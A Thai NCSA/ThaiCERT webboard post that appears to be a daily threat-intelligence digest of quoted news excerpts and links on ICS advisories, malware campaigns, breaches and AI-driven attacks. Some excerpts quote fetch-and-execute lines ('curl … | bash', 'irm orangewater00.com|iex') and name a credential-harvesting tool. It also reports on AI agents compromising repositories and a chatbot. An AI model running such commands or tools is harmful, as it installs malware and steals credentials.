NCSA Webboard
    • ล่าสุด
    • แท็ก
    • ฮิต
      • ติดต่อสำนักงาน
    • ลงทะเบียน
    • เข้าสู่ระบบ

    Cyber Threat Intelligence 10 March 2026

    Cyber Security News
    1
    1
    36
    โหลดโพสเพิ่มเติม
    • เก่าสุดไปยังใหม่สุด
    • ใหม่สุดไปยังเก่าสุด
    • Most Votes
    ตอบ
    • ตอบโดยตั้งกระทู้ใหม่
    เข้าสู่ระบบเพื่อตอบกลับ
    Topic นี้ถูกลบไปแล้ว เฉพาะผู้ใช้งานที่มีสิทธิ์ในการจัดการ Topic เท่านั้นที่จะมีสิทธิ์ในการเข้าชม
    • NCSA_THAICERTN
      NCSA_THAICERT
      แก้ไขล่าสุดโดย

      Industrial Sector

      • Portwell Engineering Toolkits
        "Successful exploitation of this vulnerability could allow a local attacker to escalate privileges or cause a denial-of-service condition."
        https://www.cisa.gov/news-events/ics-advisories/icsa-26-062-04
      • Labkotec LID-3300IP
        "Successful exploitation of this vulnerability could allow attackers to gain unauthorized control over system operations, leading to disruption of normal functionality and potential safety hazards."
        https://www.cisa.gov/news-events/ics-advisories/icsa-26-062-05
      • Mobiliti e-Mobi.hu
        "Successful exploitation of these vulnerabilities could enable attackers to gain unauthorized administrative control over vulnerable charging stations or disrupt charging services through denial-of-service attacks."
        https://www.cisa.gov/news-events/ics-advisories/icsa-26-062-06
      • ePower Epower.ie
        "Successful exploitation of these vulnerabilities could enable attackers to gain unauthorized administrative control over vulnerable charging stations or disrupt charging services through denial-of-service attacks."
        https://www.cisa.gov/news-events/ics-advisories/icsa-26-062-07
      • Everon OCPP Backends
        "Successful exploitation of these vulnerabilities could enable attackers to gain unauthorized administrative control over vulnerable charging stations or disrupt charging services through denial-of-service attacks."
        https://www.cisa.gov/news-events/ics-advisories/icsa-26-062-08
      • Mitsubishi Electric MELSEC iQ-F Series EtherNet/IP Module And Ethernet Module
        "Successful exploitation of these vulnerabilities could allow a remote attacker to cause a denial-of-service condition by continuously sending UDP packets to the affected products."
        https://www.cisa.gov/news-events/ics-advisories/icsa-26-62-01
      • Hitachi Energy Relion REB500 Product
        "Hitachi Energy is aware of vulnerabilities that affect the Relion REB500 product versions listed in this document. Authenticated users with certain roles can exploit the vulnerabilities to access and modify the directory contents they are not authorized to do so. Please refer to the Recommended Immediate Actions for information about the mitigation/remediation."
        https://www.cisa.gov/news-events/ics-advisories/icsa-26-062-02
      • Hitachi Energy RTU500 Product
        "Hitachi Energy is aware of vulnerabilities that affect RTU500 product versions listed in this document. Successful exploitation of these vulnerabilities can result in the exposure of low-value user management information and device outage. Please refer to the Recommended Immediate Actions for information about the mitigation/remediation."
        https://www.cisa.gov/news-events/ics-advisories/icsa-26-062-03
      • Delta Electronics CNCSoft-G2
        "Successful exploitation of this vulnerability could result in an attacker achieving remote code execution on the device."
        https://www.cisa.gov/news-events/ics-advisories/icsa-26-064-01

      New Tooling

      • DumpBrowserSecrets – Browser Credential Harvesting With App-Bound Encryption Bypass
        "DumpBrowserSecrets is a post-exploitation credential-harvesting tool from Maldev Academy that extracts secrets across all major browsers from a single Windows executable. It is the successor to their earlier DumpChromeSecrets project, which is now deprecated, and extends coverage from Chrome alone to the full range of Chromium-based and Gecko-based browsers in common enterprise use."
        https://www.darknet.org.uk/2026/03/dumpbrowsersecrets-browser-credential-harvesting-with-app-bound-encryption-bypass/
        https://github.com/Maldev-Academy/DumpBrowserSecrets

      Vulnerabilities

      • CISA Adds Three Known Exploited Vulnerabilities To Catalog
        "CISA has added three new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
        CVE-2021-22054 Omnissa Workspace ONE Server-Side Request Forgery
        CVE-2025-26399 SolarWinds Web Help Desk Deserialization of Untrusted Data Vulnerability
        CVE-2026-1603 Ivanti Endpoint Manager (EPM) Authentication Bypass Vulnerability"
        https://www.cisa.gov/news-events/alerts/2026/03/09/cisa-adds-three-known-exploited-vulnerabilities-catalog
      • Partnering With Mozilla To Improve Firefox’s Security
        "AI models can now independently identify high-severity vulnerabilities in complex software. As we recently documented, Claude found more than 500 zero-day vulnerabilities (security flaws that are unknown to the software’s maintainers) in well-tested open-source software. In this post, we share details of a collaboration with researchers at Mozilla in which Claude Opus 4.6 discovered 22 vulnerabilities over the course of two weeks. Of these, Mozilla assigned 14 as high-severity vulnerabilities—almost a fifth of all high-severity Firefox vulnerabilities that were remediated in 2025. In other words: AI is making it possible to detect severe security vulnerabilities at highly accelerated speeds."
        https://www.anthropic.com/news/mozilla-firefox-security
        https://securityaffairs.com/189131/ai/anthropic-claude-opus-ai-model-discovers-22-firefox-bugs.html
      • AI Vs AI: Agent Hacked McKinsey's Chatbot And Gained Full Read-Write Access In Just Two Hours
        "Researchers at red-team security startup CodeWall say their AI agent hacked McKinsey's internal AI platform and gained full read and write access to the chatbot in just two hours. It's yet another indicator that agentic AI is becoming a more effective tool for conducting cyberattacks, including those against other AI systems. This attack wasn’t conducted with malicious intent. However, threat hunters tell us that miscreants are increasingly using agents in real-world attacks, indicating that machine-speed intrusions aren't going away."
        https://www.theregister.com/2026/03/09/mckinsey_ai_chatbot_hacked/

      Malware

      • New A0Backdoor Linked To Teams Impersonation And Quick Assist Social Engineering
        "BlueVoyant Security Operations Center (SOC) and Threat Fusion Cell (TFC) continue to track an activity cluster that uses email bombing and IT-support impersonation over Microsoft Teams to obtain Quick Assist access, then pivot to a deeper attack. This research shows that once on the victim’s host, the actors sideload a malicious DLL to deliver a new backdoor BlueVoyant has dubbed the A0Backdoor. The malware’s loader exhibits anti-sandbox evasion, and the campaign’s command-and-control appears to have pivoted to a covert DNS mail exchange-based channel that confines endpoint traffic to trusted recursive resolvers."
        https://www.bluevoyant.com/blog/new-a0backdoor-linked-to-teams-impersonation-and-quick-assist-social-engineering
        https://www.bleepingcomputer.com/news/security/microsoft-teams-phishing-targets-employees-with-backdoors/
      • ShinyHunters Claims Ongoing Salesforce Aura Data Theft Attacks
        "Salesforce is warning customers that hackers are targeting websites with misconfigured Experience Cloud platforms that give guest users access to more data than intended. However, the ShinyHunters extortion gang claims to be actively exploiting a new bug to steal data from instances. Salesforce has shared guidance for its customers to defend against hackers actively targeting the /s/sfsites/aura API endpoint on misconfigured Experience Cloud instances that gives guest users access to more data than intended. The company states that attackers are deploying a modified version of AuraInspector, an open-source auditing tool developed by Mandiant, which can help administrators identify access control misconfigurations within the Salesforce Aura framework."
        https://www.bleepingcomputer.com/news/security/shinyhunters-claims-ongoing-salesforce-aura-data-theft-attacks/
        https://www.salesforce.com/blog/protecting-your-data-essential-actions-to-secure-experience-cloud-guest-user-access/
        https://www.theregister.com/2026/03/09/shinyhunters_claims_more_highprofile_victims/
      • FBI Warns Of Phishing Attacks Impersonating US City, County Officials
        "The Federal Bureau of Investigation (FBI) warns that criminals are impersonating U.S. officials in phishing attacks targeting businesses and individuals who request city and county planning and zoning permits. In a public service announcement published on Monday, the bureau said that the criminals behind this campaign are identifying potential victims using publicly available information, which also makes their malicious messages seem legitimate and helps them trick suspicious targets."
        https://www.bleepingcomputer.com/news/security/fbi-warns-of-phishing-attacks-impersonating-us-city-county-officials/
        https://www.ic3.gov/PSA/2026/PSA260309
        https://securityaffairs.com/189165/cyber-crime/fbi-alert-scammers-target-zoning-permit-applicants.html
      • China-Nexus Activity Against Qatar Observed Amid Expanding Regional Tensions
        "Since the recent escalation in the Middle East, Check Point Research has observed increased activity by Chinese-nexus APT actors in the region, particularly targeting Qatar. The Chinese-nexus threat actor Camaro Dragon attempted to deploy a variant of PlugX malware against Qatari targets within one day of the launch of Operation Epic Fury and the onset of the escalation in the Middle East. The attackers leveraged the ongoing war in the Middle East to make their lures more credible and engaging, demonstrating the ability to rapidly adapt to major developments and breaking news."
        https://blog.checkpoint.com/research/china-nexus-activity-against-qatar-observed-amid-expanding-regional-tensions/
        ACSC, NCSC, And CERT Tonga Warn Of Growing INC Ransom Activity Targeting Healthcare And Organizations Across Australia, New Zealand, And Pacific States.
        "Cybersecurity agencies across the Pacific region are sharing concerns about the ransomware group INC Ransom’s expanding activities and the growing influence of its affiliate network. A joint advisory issued by the Australian Cyber Security Centre (ACSC), National Computer Emergency Response Team Tonga (CERT Tonga), and the New Zealand National Cyber Security Centre (NCSC) highlights how the INC Ransom ecosystem has become an active threat to organizations in Australia, New Zealand, and Pacific Island states."
        https://cyble.com/blog/inc-ransom-attacks-australia-new-zealand/
      • Hackerbot-Claw: Adversarial Agent Targets Top GitHub Repos
        "Pillar Security researchers analyzed the hackerbot-claw campaign, we named “Chaos Agent” - the first publicly documented campaign where an AI agent, operating on natural-language instructions, conducted an end-to-end attack against production open-source infrastructure. Within 37 hours, hackerbot-claw identified vulnerable open-source projects, crafted targeted exploits, compromised CI/CD pipelines, and published a malicious extension that turned developers' own AI coding tools into credential-stealing accomplices."
        https://www.pillar.security/blog/hackerbot-claw-adversarial-agent-targets-top-github-repos
        https://hackread.com/ai-bot-hackerbot-claw-microsoft-datadog-github-repos/
      • Someone Else’s SIEM: A Threat Actor Abuses Another Free Trial
        "Huntress discovered a threat actor was exploiting vulnerabilities (like SolarWinds Web Help Desk) and exfiltrating victim data to a free trial instance of Elastic Cloud SIEM. The actor used the SIEM for victim triage, and the infrastructure revealed details about their campaign, including disposable email services (quieresmail.com), connections to a Russian-registered temporary email network (firstmail.ltd), use of a SAFING_VPN tunnel, and a possible connection to other opportunistic attacks against Microsoft SharePoint and other software. The instance has since been taken down."
        https://www.huntress.com/blog/threat-actor-abuses-elastic-cloud-siem
        https://www.infosecurity-magazine.com/news/elastic-cloud-siem-manage-stolen/
      • Fake Claude Code Install Pages Hit Windows And Mac Users With Infostealers
        "Attackers are cloning install pages for popular tools like Claude Code and swapping the “one‑liner” install commands with malware, mainly to steal passwords, cookies, sessions, and access to developer environments. Modern install guides often tell you to copy a single command like curl https://malware-site | bash into your terminal and hit Enter.​ That habit turns the website into a remote control: whatever script lives at that URL runs with your permissions, often those of an administrator."
        https://www.malwarebytes.com/blog/news/2026/03/fake-claude-code-install-pages-hit-windows-and-mac-users-with-infostealers
      • Quiz Sites Trick Users Into Enabling Unwanted Browser Notifications
        "Our support team flagged a number of customers who suspected their device might be infected with malware, but Malwarebytes scans came up empty. When the customers provided screenshots, our Malware Removal Support team quickly recognized the format as web push notifications. The reason the scans came up clean is that these notifications aren’t malware on the device. They’re browser notifications from websites that trick users into clicking “Allow.”"
        https://www.malwarebytes.com/blog/threat-intel/2026/03/quiz-sites-trick-users-into-enabling-unwanted-browser-notifications
      • GhostClaw Unmasked: A Malicious Npm Package Impersonating OpenClaw To Steal Everything
        "The JFrog Security research team has identified a live malicious npm package named @openclaw-ai/openclawai. This package masquerades as a legitimate CLI tool called "OpenClaw Installer" while deploying a multi-stage infection chain that steals system credentials, browser data, crypto wallets, SSH keys, Apple Keychain databases, iMessage history, and more - then installs a persistent RAT with full remote access capabilities including a SOCKS5 proxy and live browser session cloning. The attack is notable for its broad data collection, its use of social engineering to harvest the victim's system password, and the sophistication of its persistence and C2 infrastructure. Internally, the malware identifies itself as GhostLoader."
        https://research.jfrog.com/post/ghostclaw-unmasked/
        https://thehackernews.com/2026/03/malicious-npm-package-posing-as.html
      • From a Sophisticated Browser-Extension Supply-Chain Compromise To a VibeCoded Twist: A Chrome Extension As The Initial Access Vector For a Broader Malware Chain
        "A formerly legitimate Featured Chrome extension (ShotBird) was turned into a remote-controlled malware channel after an apparent ownership transfer. The malicious version beaconed to attacker infrastructure, received callback-delivered JavaScript tasks, stripped browser security headers, injected fake Chrome update lures, and captured sensitive form data. In the observed Windows file-delivery path, victims were pushed to run googleupdate.exe, a fake update wrapper that carried a real Google-signed ChromeSetup.exe alongside a malicious psfx.msi stager. Host-side PowerShell 4104 logs later confirmed execution of the decoded stager irm orangewater00.com|iex and allowed reconstruction of a larger second stage with ETW suppression, Credential Manager access, Chromium data targeting, and upload logic. In short: this was not just extension abuse, but a browser-to-endpoint compromise chain with likely credential-theft capability."
        https://monxresearch-sec.github.io/shotbird-extension-malware-report/
        https://thehackernews.com/2026/03/chrome-extension-turns-malicious-after.html

      Breaches/Hacks/Leaks

      • Ericsson US Discloses Data Breach After Service Provider Hack
        "Ericsson Inc., the U.S. subsidiary of Swedish networking and telecommunications giant Ericsson, says attackers have stolen data belonging to an undisclosed number of employees and customers after hacking one of its service providers. Headquartered in Stockholm and founded in 1876, the parent company is a communications tech leader with nearly 90,000 employees worldwide. In data breach notification letters sent to affected individuals and filed with the California Attorney General on Monday, Ericsson said that a service provider who was storing personal data for employees and customers discovered a breach on April 28, 2025."
        https://www.bleepingcomputer.com/news/security/ericsson-us-discloses-data-breach-after-service-provider-hack/
      • EV Charger Biz ELECQ Zapped By Ransomware Crooks, Customer Contact Data Stolen
        "ELECQ, maker of smart electric vehicle (EV) chargers, is warning customers that their personal details may have been stolen in a ransomware attack that encrypted and copied user data from its cloud systems. In a notice sent to customers on Monday and seen by The Register, the EV charging outfit said that it detected "unusual activity" on its AWS cloud platform on March 7 and quickly discovered that attackers had launched a ransomware attack against parts of its infrastructure."
        https://www.theregister.com/2026/03/09/ransomware_crooks_hit_ev_charger/

      General News

      • Google: Cloud Attacks Exploit Flaws More Than Weak Credentials
        "Hackers are increasingly exploiting newly disclosed vulnerabilities in third-party software to gain initial access to cloud environments, with the window for attacks shrinking from weeks to just days. At the same time, the use of weak credentials or misconfigurations has dropped significantly in the second half of 2025, Google notes in a report highlighting the trends on threats to cloud users. According to the report, incident responders determined that bug exploits were the primary access vector in 44.5% of the investigated intrusions, while credentials were responsible for 27% of the breaches."
        https://www.bleepingcomputer.com/news/security/google-cloud-attacks-exploit-flaws-more-than-weak-credentials/
        https://services.google.com/fh/files/misc/cloud_threat_horizons_report_h12026.pdf
      • Dutch Govt Warns Of Signal, WhatsApp Account Hijacking Attacks
        "Russian state-sponsored hackers have been linked to an ongoing Signal and WhatsApp phishing campaign targeting government officials, military personnel, and journalists to gain access to sensitive messages. This report comes from the Netherlands Defence Intelligence and Security Service (MIVD) and the Netherlands General Intelligence and Security Service (AIVD), who confirmed that Dutch government employees have been targeted in the attacks. The Dutch intelligence agencies say the operation relies on phishing and social-engineering techniques that abuse legitimate authentication features to take over accounts and covertly monitor new messages."
        <1https://www.bleepingcomputer.com/news/security/dutch-govt-warns-of-signal-whatsapp-account-hijacking-attacks/>
        https://therecord.media/russian-hackers-target-signal-whatsapp-warn-dutch-intelligence-agencies
        https://hackread.com/dutch-intel-russia-hackers-hijack-signal-whatsapp-attacks/
        https://securityaffairs.com/189156/intelligence/russia-linked-hackers-target-signal-whatsapp-of-officials-globally.html
        https://www.theregister.com/2026/03/09/dutch_spies_say_russian_cybercrims/
        https://www.helpnetsecurity.com/2026/03/09/signal-whatsapp-accounts-russian-hackers/
      • Are We Ready For Auto Remediation With Agentic AI?
        "The key to security program effectiveness is optimizing remediation. This has become increasingly difficult as organizations strive to modernize their processes with innovative technologies, including artificial intelligence (AI). As employees gain capabilities to collaborate and work faster, cyber assets and attack surfaces proliferate, making it difficult for security teams to take the needed actions to mitigate risk. Now, as organizations look to leverage agentic AI in areas such as software development, instead of incrementally increasing productivity, we are expecting exponential gains in productivity, further proliferating attack surfaces. At the same time, the threat landscape will also evolve rapidly, with attackers taking advantage of AI to scale their attacks."
        https://www.darkreading.com/application-security/auto-remediation-agentic-ai
      • More AI Tools, More Burnout! New Research Explains Why
        "Workflows built around multiple AI agents and constant tool switching are adding cognitive strain across large enterprises. A recent Harvard Business Review analysis describes this pattern as “AI brain fry,” a form of mental fatigue tied to intensive use and oversight of AI systems. Employees increasingly manage clusters of agents that generate code, synthesize information, and produce drafts at high speed. Performance systems in some organizations reward activity metrics such as token consumption and AI output volume. This structure pushes workers to monitor more systems and outcomes within the same workday."
        https://www.helpnetsecurity.com/2026/03/09/harvard-business-review-ai-workplace-fatigue-report/
      • Ghanaian Pleads Guilty To Role In $100m Romance Scam
        "A Ghanaian national had pleaded guilty to scamming countless victims as part of a global fraud ring that engaged in romance fraud and business email compromise (BEC). The Justice Department announced the guilty plea for Derrick Van Yeboah, 40, late last week. The fraud operation, which was primarily based in Ghana, is said to have caused over $100m in losses, 10% of which were pinned on Van Yeboah. As per typical scams of this kind, he impersonated romantic partners in online communications with vulnerable victims."
        https://www.infosecurity-magazine.com/news/ghanaian-pleads-guilty-100m/
      • Cloud Threat Horizons Report H1 2026
        "The Google Cloud Threat Horizons Report provides decision-makers with strategic intelligence on threats to not just Google Cloud, but all cloud service providers. The report focuses on recommendations for mitigating risks and improving cloud security for leaders and practitioners. The report is informed by Google Cloud’s Office of the CISO, Google Threat Intelligence Group (GTIG), Mandiant Consulting, and various Google Cloud intelligence, security, and product teams."
        https://cloud.google.com/security/report/resources/cloud-threat-horizons-report-h1-2026
        https://thehackernews.com/2026/03/unc4899-used-airdrop-file-transfer-and.html
      • White House Cyber Strategy Prioritizes Offense
        "The Trump administration released a notably hawkish vision of American cyber power that blends deregulation at home with deterrence and offense against adversaries abroad. In a relatively brief seven-page document published on Friday, President Trump's Cyber Strategy for America framed cybersecurity both as a defensive IT challenge and as a strategic domain where the US must assert dominance amid intensifying geopolitical rivalries. American response to cyber threats will not be confined to the cyber realm, the document warned."
        https://www.darkreading.com/cybersecurity-operations/white-house-cyber-strategy-prioritizes-offense
        https://www.whitehouse.gov/wp-content/uploads/2026/03/President-Trumps-Cyber-Strategy-for-America.pdf
        https://therecord.media/trump-cyber-strategy-released-regulations
        https://www.bankinfosecurity.com/trump-pledges-action-on-cybercrime-cyberspace-threats-a-30942
        https://www.infosecurity-magazine.com/news/usa-unveils-new-cyber-strategy/
        https://www.securityweek.com/us-cyber-strategy-targets-adversaries-critical-infrastructure-and-emerging-technologies/

      อ้างอิง
      Electronic Transactions Development Agency (ETDA) 6337f8a0-8b97-4059-b4cc-4dfda0bfa3ce-image.png

      1 การตอบกลับ คำตอบล่าสุด ตอบ คำอ้างอิง 0
      • First post
        Last post